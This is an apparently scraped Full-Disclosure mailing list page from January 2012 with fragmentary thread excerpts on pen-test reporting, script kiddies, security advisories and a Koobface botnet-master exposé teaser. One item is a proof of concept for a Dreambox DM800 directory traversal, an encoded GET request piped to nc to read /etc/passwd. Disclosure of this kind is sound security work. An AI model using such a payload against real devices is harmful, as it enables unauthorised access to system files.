Also, as someone remarked on another thread on this list, it is your
report that will be read by the client or the suits in your company.
If you cannot construct a grammatically correct sentence, all your
fancy work showing the holes in the infrastructure is worth zipity doo
dah.
Dreambox DM800 traversal path exploit
Dreambox DM800 suffers from traversal path exploit
With standard GET command we can retreive /etc/passwd
PoC:
echo -e 'GET
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
HTTP/1.1\n\n' | nc ip 80
,
Earlier today I noticed I was getting a lot of TCP port 6515 proxies on
The List (http://www.mrhinkydink.com/proxies.htm ) Curious, I checked
one it and it gave me a VIA header of
1.1 Fran-PC (McAfee Relay Server 5.2.3)
Then I took a peek at the database. Nearly 1900 of these things since
On Sat, Jan 7, 2012 at 5:42 PM, valdis.kletni...@vt.edu wrote:
It matters a lot less than you think. Go look at Sony's stock price while
they
were having their security issues - it was already sliding *before* PSN
got hacked,
but continued sliding at the *exact same rate* for several
On Tue, Jan 10, 2012 at 12:11 AM, Jeffrey Walton noloa...@gmail.com wrote:
I believe the term is arbitrage (not rounding attacks).
Nope: https://en.wikipedia.org/wiki/Arbitrage
MemoryVandal
___
Full-Disclosure - We believe in it.
Charter:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
Debian Security Advisory DSA-2384-1 secur...@debian.org
http://www.debian.org/security/ Luk Claes
January 09, 2012
--On January 9, 2012 10:34:40 AM -0800 Bob Dobbs bobd10...@gmail.com
wrote:
On Sat, Jan 7, 2012 at 5:42 PM, valdis.kletni...@vt.edu wrote:
It matters a lot less than you think. Go look at Sony's stock price
while they
were having their security issues - it was already sliding *before* PSN
On Mon, 09 Jan 2012 20:00:11 +0100, J. von Balzac said:
Valdis you make me curious - how do you know that most are kids, and
script kiddies?
Note that it wasn't me who suggested hiring script kiddies to do pen tests. I
was pointing out why it wouldn't work.
Isn't it more likely that the
On Mon, Jan 9, 2012 at 1:49 PM, Memory Vandal memvan...@gmail.com wrote:
On Tue, Jan 10, 2012 at 12:11 AM, Jeffrey Walton noloa...@gmail.com wrote:
I believe the term is arbitrage (not rounding attacks).
Nope: https://en.wikipedia.org/wiki/Arbitrage
Plus:
https://www.google.com/?#q=arbitragetbs=dfn:1fp=1
On Mon, Jan 9, 2012 at 2:05 PM, Jeffrey Walton noloa...@gmail.com wrote:
On Mon, Jan 9, 2012 at 1:49 PM, Memory Vandal memvan...@gmail.com wrote:
On Tue, Jan 10, 2012 at 12:11 AM, Jeffrey Walton noloa...@gmail.com
wrote:
I
adam to Jeffrey Walton to Memory Vandal to Jeffrey Walton:
I believe the term is arbitrage (not rounding attacks).
Nope: https://en.wikipedia.org/wiki/Arbitrage
http://www.google.com/?q=currency+arbitrage. *sigh*.
Plus:
https://www.google.com/?#q=arbitragetbs=dfn:1fp=1
Now, it
Title: DDIVRT-2011-37 HP JetDirect Device Page Directory Traversal
(CVE-2011-4785)
Severity: High
Date Discovered: 2011-10-12
Discovered By: Digital Defense, Inc. Vulnerability Research Team
Credited To: sxkeebler and r@b13$
Vulnerability Description:
The HP-ChaiSOE/1.0 embedded web server on
Hi everyone,
In this post, I will perform an OSINT analysis, exposing one of the
key botnet masters behind the infamous Koobface botnet, that I have
been extensively profiling and infiltrating since day one. I will
include photos of the botnet master, his telephone numbers, multiple
email
[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
- Introduction Purpose -
This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with
Last issue of PenTest StarterKit is out. Download it now and enjoz
reading. To satzsfy needs and interests of our readers next month
instead of StarterKit we will have Auditing standards
Enjoy Reading
http://pentestmag.com/pentest-starterkit-12012/
--
Olga Glowala
Skype olga_glowala (GMT
I was working at coreix when we took down the original CC and have icq
numbers, source and logs.
What's your point? I'm sure its good work but this was all done over a year ago
and is on copies in a police store room somewhere.
Sent from my BlackBerry® wireless device
-Original
Hi all,
Astaro hereby confirms the described vulnerability.
In spite of the text below it is not remote exploitable, but needs a valid
administration account to access the web configuration interface called
WebAdmin.
Within WebAdmin a privilege escalation is the worst case scenario which can
Most of the kids are skript kiddies, and don't really understand the *defense*
end of the security business very well. Sure, some may be better than skript
kiddies, and may be *incredible* at finding a memory overlay or an SQL
injection, but do they know how to *secure* against *everything*?
Hi,
zaebalinax.com is literally translated to Gave up on Linux.
just FYI it's not zaeba linax or whatever, but zaebali nax (where
nax is short for nahuy), the translation would likely be they've
f*cked me up or sort of you all are p*ssing me off.
--
Cheers,
Kai
19 matches
Mail list logo